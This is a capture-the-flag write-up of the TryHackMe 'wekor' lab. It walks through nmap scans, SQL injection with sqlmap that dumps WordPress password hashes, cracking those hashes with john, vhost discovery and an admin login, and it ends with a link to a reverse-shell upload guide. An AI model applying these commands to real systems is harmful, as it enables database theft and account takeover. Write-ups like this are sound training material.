Enumeration

Port Scan

Started with an NMAP Scan (as usual)

monoloco@kali:~/Dokumente/THM/wekor$ nmap -sV -sC -oA nmap/output wektor.thm
Starting Nmap 7.80 ( https://nmap.org ) at 2021-03-08 19:59 GMT
Nmap scan report for wektor.thm (10.10.88.16)
Host is up (0.078s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:c3:ce:af:07:fa:e2:8e:29:04:e4:cd:14:6a:21:b5 (RSA)
|_  256 0d:e5:7d:e8:1a:12:c0:dd:b7:66:5e:98:34:55:59:f6 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 9 disallowed entries 
| /workshop/ /root/ /lol/ /agent/ /feed /crawler /boot 
|_/comingreallysoon /interesting
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.31 seconds

Next I had a look at all the directories listed inside the robots.txt

User-agent: *
Disallow: /workshop/
Disallow: /root/
Disallow: /lol/
Disallow: /agent/
Disallow: /feed
Disallow: /crawler
Disallow: /boot
Disallow: /comingreallysoon
Disallow: /interesting

Only http://wektor.thm/comingreallysoon/ is reachable.

This leads me to: wektor.thm/it-next

After checking out the webpage in much detail I could not find anything.

So I ran another NMAP Scan going for UDP Ports

sudo nmap -sU wektor.thm

PORT      STATE         SERVICE
68/udp    open|filtered dhcpc
631/udp   open|filtered ipp
5353/udp  open|filtered zeroconf
54711/udp open|filtered unknown

UDP Port Scan did not lead anywhere!!!

Finally found an SQLi under:

• http://wekor.thm/it-next/it_cart.php
• ran sqlmap
  • sqlmap -r coupon.txt -p coupon_code -D wordpress -T wp_users --dump

extracted user table using sqlmap

admin:$P$BoyfR2QzhNjRNmQZpva6TuuD0EE31B.
wp_eagle:$P$BpyTRbmvfcKyTrbDzaK1zSPgM7J6QY/
wp_yura:$P$B6jSC3m7WdMlLi1/NDb3OFhqv536SV/
wp_jeffrey:$P$BU8QpWD.kHZv3Vd1r52ibmO913hmj10

Cracking the password using john

monoloco@kali:~/Dokumente/THM/wekor$ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
4 password hashes with 4 different salts (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Remaining 3 password hashes with 3 different salts
Cost 1 (iteration count) is 8192 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (wp_eagle)
soccer13         (wp_yura)

Virtual Hostname Enumeration

with the following command

gobuster vhost -w /usr/share/wordlists/dirb/common.txt wekor.thm

I found the vhost: site.wekor.thm

Under http://site.wekor.thm/wordpress/wp-admin I could login with the extracted credentials.

Reverse Shell using: https://www.hacknos.com/wordpress-shell-upload/